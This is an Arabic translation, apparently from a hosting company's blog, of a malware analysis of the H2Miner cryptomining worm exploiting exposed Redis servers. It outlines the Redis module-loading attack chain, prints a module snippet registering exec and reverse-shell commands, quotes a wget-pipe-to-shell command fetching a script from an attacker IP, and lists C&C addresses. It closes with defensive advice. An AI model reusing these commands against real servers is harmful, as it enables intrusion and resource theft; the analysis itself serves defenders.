ProHoster > بلوق > إدارة > تم اكتشاف انتشار جديد لديدان H2Miner التي تستغل Redis RCE

تم اكتشاف انتشار جديد لديدان H2Miner التي تستغل Redis RCE

قبل يوم واحد، تعرض أحد خوادم مشروعي لهجوم بواسطة فيروس متنقل مماثل. بحثاً عن إجابة لسؤال "ما كان ذلك؟" لقد وجدت مقالة رائعة كتبها فريق Alibaba Cloud Security. بما أنني لم أجد هذا المقال على حبري، قررت أن أترجمه لكم خصيصاً <3

دخول

اكتشف فريق أمان Alibaba Cloud مؤخرًا تفشيًا مفاجئًا لـ H2Miner. يستخدم هذا النوع من الفيروسات المتنقلة الخبيثة نقص التفويض أو كلمات المرور الضعيفة لـ Redis كبوابات إلى أنظمتك، وبعد ذلك يقوم بمزامنة الوحدة الضارة الخاصة به مع العبد من خلال مزامنة السيد والعبد، وأخيرًا يقوم بتنزيل هذه الوحدة الضارة على الجهاز الذي تمت مهاجمته وتنفيذ هجمات ضارة. تعليمات.

في الماضي، تم تنفيذ الهجمات على أنظمتك بشكل أساسي باستخدام طريقة تتضمن مهام مجدولة أو مفاتيح SSH تمت كتابتها على جهازك بعد أن قام المهاجم بتسجيل الدخول إلى Redis. لحسن الحظ، لا يمكن استخدام هذه الطريقة كثيرًا بسبب مشكلات التحكم في الأذونات أو بسبب اختلاف إصدارات النظام. ومع ذلك، يمكن لهذه الطريقة لتحميل وحدة ضارة تنفيذ أوامر المهاجم مباشرة أو الوصول إلى الغلاف، وهو ما يشكل خطورة على نظامك.

نظرًا للعدد الكبير من خوادم Redis المستضافة على الإنترنت (ما يقرب من مليون خادم)، يوصي فريق الأمان في Alibaba Cloud، كتذكير ودي، بعدم مشاركة المستخدمين لـ Redis عبر الإنترنت والتحقق بانتظام من قوة كلمات المرور الخاصة بهم وما إذا كانت قد تم اختراقها. اختيار سريع.

H2Miner

H2Miner عبارة عن شبكة روبوت للتعدين للأنظمة المستندة إلى Linux والتي يمكنها غزو نظامك بعدة طرق، بما في ذلك عدم الترخيص في ثغرات Hadoop الغزل وDocker وRedis لتنفيذ الأوامر عن بعد (RCE). تعمل شبكة الروبوتات عن طريق تنزيل البرامج النصية الضارة والبرامج الضارة لاستخراج بياناتك، وتوسيع الهجوم أفقيًا، والحفاظ على اتصالات القيادة والتحكم (C&C).

ريديس آر سي إي

تمت مشاركة المعرفة حول هذا الموضوع بواسطة Pavel Toporkov في ZeroNights 2018. بعد الإصدار 4.0، يدعم Redis ميزة تحميل المكونات الإضافية التي تمنح المستخدمين القدرة على تحميل الملفات المترجمة باستخدام لغة C إلى Redis لتنفيذ أوامر Redis محددة. على الرغم من أن هذه الوظيفة مفيدة، إلا أنها تحتوي على ثغرة أمنية يمكن من خلالها، في الوضع الرئيسي والتابع، مزامنة الملفات مع العبد عبر وضع المزامنة الكاملة. يمكن للمهاجم استخدام هذا لنقل الملفات الضارة. بعد اكتمال النقل، يقوم المهاجمون بتحميل الوحدة على نسخة Redis التي تمت مهاجمتها وتنفيذ أي أمر.

تحليل دودة البرمجيات الخبيثة

اكتشف فريق أمان Alibaba Cloud مؤخرًا أن حجم مجموعة التعدين الضارة H2Miner قد زاد فجأة بشكل كبير. وفقًا للتحليل، فإن العملية العامة لحدوث الهجوم هي كما يلي:

تم اكتشاف انتشار جديد لديدان H2Miner التي تستغل Redis RCE

يستخدم H2Miner RCE Redis لهجوم كامل. يهاجم المهاجمون أولاً خوادم Redis غير المحمية أو الخوادم التي تحتوي على كلمات مرور ضعيفة.

ثم يستخدمون الأمر config set dbfilename red2.so لتغيير اسم الملف. بعد ذلك، يقوم المهاجمون بتنفيذ الأمر slaveof لتعيين عنوان مضيف النسخ المتماثل السيد والعبد.

عندما ينشئ مثيل Redis الذي تمت مهاجمته اتصالاً رئيسيًا وتابعًا مع Redis الضار الذي يملكه المهاجم، يرسل المهاجم الوحدة المصابة باستخدام الأمر fullresync لمزامنة الملفات. سيتم بعد ذلك تنزيل الملف red2.so على الجهاز الذي تمت مهاجمته. ثم يستخدم المهاجمون وحدة التحميل ./red2.so لتحميل هذا الملف. يمكن للوحدة تنفيذ أوامر من مهاجم أو بدء اتصال عكسي (باب خلفي) للوصول إلى الجهاز الذي تمت مهاجمته.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

بعد تنفيذ أمر ضار مثل / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1سيقوم المهاجم بإعادة تعيين اسم ملف النسخ الاحتياطي وإلغاء تحميل وحدة النظام لتنظيف الآثار. ومع ذلك، سيظل الملف red2.so موجودًا على الجهاز الذي تمت مهاجمته. يُنصح المستخدمون بالانتباه إلى وجود مثل هذا الملف المشبوه في المجلد الخاص بمثيل Redis الخاص بهم.

بالإضافة إلى قتل بعض العمليات الضارة لسرقة الموارد، اتبع المهاجم برنامجًا نصيًا ضارًا عن طريق تنزيل ملفات ثنائية ضارة وتنفيذها إلى 142.44.191.122/كينسينج. وهذا يعني أن اسم العملية أو اسم الدليل الذي يحتوي على الوصل على المضيف قد يشير إلى إصابة هذا الجهاز بهذا الفيروس.

وفقًا لنتائج الهندسة العكسية، تؤدي البرامج الضارة بشكل أساسي الوظائف التالية:

  • تحميل الملفات وتنفيذها
  • التعدين
  • الحفاظ على اتصالات القيادة والسيطرة وتنفيذ أوامر المهاجم

تم اكتشاف انتشار جديد لديدان H2Miner التي تستغل Redis RCE

استخدم Masscan للمسح الخارجي لتوسيع نفوذك. بالإضافة إلى ذلك، يتم ترميز عنوان IP الخاص بخادم القيادة والسيطرة بشكل ثابت في البرنامج، وسيتواصل المضيف المهاجم مع خادم اتصالات القيادة والسيطرة باستخدام طلبات HTTP، حيث يتم تحديد معلومات الزومبي (الخادم المخترق) في رأس HTTP.

تم اكتشاف انتشار جديد لديدان H2Miner التي تستغل Redis RCE

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

طرق الهجوم الأخرى

تم اكتشاف انتشار جديد لديدان H2Miner التي تستغل Redis RCE

العناوين والروابط التي تستخدمها الدودة

/القرابة

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

الشروط والأحكام

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

مجلس

أولاً، لا ينبغي الوصول إلى Redis من الإنترنت ويجب حمايته بكلمة مرور قوية. من المهم أيضًا أن يتحقق العملاء من عدم وجود ملف red2.so في دليل Redis ومن عدم وجود "قرابة" في اسم الملف/العملية على المضيف.

المصدر: www.habr.com

إضافة تعليق